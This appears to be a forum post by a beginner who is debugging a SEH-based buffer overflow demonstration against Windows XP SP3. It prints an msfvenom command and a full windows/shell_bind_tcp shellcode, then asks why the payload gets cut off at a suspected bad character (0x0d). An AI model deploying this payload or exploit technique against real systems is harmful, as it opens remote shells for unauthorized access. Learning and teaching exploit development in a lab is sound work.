I'm writing a simple buffer overflow exploit demonstration. I have successfully managed to use it to launch calc.exe with a 343 bytes long shellcode and can also guarantee that I have at least 400 bytes of space (probably much more but that's more than I should need).
I generated the following shell_bind_tcp using msfvenom with:
> msfvenom -p windows/shell_bind_tcp -b '\x00' -f python
shellcode = ""
shellcode += "\xba\xa5\x9f\xf1\x94\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x53\x83\xee\xfc\x31\x56\x0e\x03\xf3\x91\x13"
shellcode += "\x61\x07\x45\x51\x8a\xf7\x96\x36\x02\x12\xa7\x76\x70"
shellcode += "\x57\x98\x46\xf2\x35\x15\x2c\x56\xad\xae\x40\x7f\xc2"
shellcode += "\x07\xee\x59\xed\x98\x43\x99\x6c\x1b\x9e\xce\x4e\x22"
shellcode += "\x51\x03\x8f\x63\x8c\xee\xdd\x3c\xda\x5d\xf1\x49\x96"
shellcode += "\x5d\x7a\x01\x36\xe6\x9f\xd2\x39\xc7\x0e\x68\x60\xc7"
shellcode += "\xb1\xbd\x18\x4e\xa9\xa2\x25\x18\x42\x10\xd1\x9b\x82"
shellcode += "\x68\x1a\x37\xeb\x44\xe9\x49\x2c\x62\x12\x3c\x44\x90"
shellcode += "\xaf\x47\x93\xea\x6b\xcd\x07\x4c\xff\x75\xe3\x6c\x2c"
shellcode += "\xe3\x60\x62\x99\x67\x2e\x67\x1c\xab\x45\x93\x95\x4a"
shellcode += "\x89\x15\xed\x68\x0d\x7d\xb5\x11\x14\xdb\x18\x2d\x46" // chops off after 4 bytes here
shellcode += "\x84\xc5\x8b\x0d\x29\x11\xa6\x4c\x26\xd6\x8b\x6e\xb6"
shellcode += "\x70\x9b\x1d\x84\xdf\x37\x89\xa4\xa8\x91\x4e\xca\x82"
shellcode += "\x66\xc0\x35\x2d\x97\xc9\xf1\x79\xc7\x61\xd3\x01\x8c"
shellcode += "\x71\xdc\xd7\x39\x79\x7b\x88\x5f\x84\x3b\x78\xe0\x26"
shellcode += "\xd4\x92\xef\x19\xc4\x9c\x25\x32\x6d\x61\xc6\x2d\x32"
shellcode += "\xec\x20\x27\xda\xb8\xfb\xdf\x18\x9f\x33\x78\x62\xf5"
shellcode += "\x6b\xee\x2b\x1f\xab\x11\xac\x35\x9b\x85\x27\x5a\x1f"
shellcode += "\xb4\x37\x77\x37\xa1\xa0\x0d\xd6\x80\x51\x11\xf3\x72"
shellcode += "\xf1\x80\x98\x82\x7c\xb9\x36\xd5\x29\x0f\x4f\xb3\xc7"
shellcode += "\x36\xf9\xa1\x15\xae\xc2\x61\xc2\x13\xcc\x68\x87\x28"
shellcode += "\xea\x7a\x51\xb0\xb6\x2e\x0d\xe7\x60\x98\xeb\x51\xc3"
shellcode += "\x72\xa2\x0e\x8d\x12\x33\x7d\x0e\x64\x3c\xa8\xf8\x88"
shellcode += "\x8d\x05\xbd\xb7\x22\xc2\x49\xc0\x5e\x72\xb5\x1b\xdb"
shellcode += "\x82\xfc\x01\x4a\x0b\x59\xd0\xce\x56\x5a\x0f\x0c\x6f"
shellcode += "\xd9\xa5\xed\x94\xc1\xcc\xe8\xd1\x45\x3d\x81\x4a\x20"
shellcode += "\x41\x36\x6a\x61"
It is 355 bytes long so fits well within my limit, but when I look at the debugger:
You can see that part of the shellcode gets replaced with 00 after 8915 ED68 (marked in the code above). The calc.exe shellcode doesn't get mashed up here and actually functions. I'm quite new to exploit writing and I have no idea why this is happening, although I'm guessing it's something to do with the contents of the shellcode (perhaps another "bad character" besides 00?).
The target platform is Windows XP SP3 with DEP disabled. The exploit overwrites SEH with a POP-POP-RETN to return to NSEH which jumps over a few bytes to land in the shellcode. Like I said, exploit works fine with another shellcode, but I need to demonstrate with a remote shell.
EDIT: Am now wondering if 0d is also not forbidden (it's the byte right after the cut off point), will try and get back.
Aucun commentaire:
Enregistrer un commentaire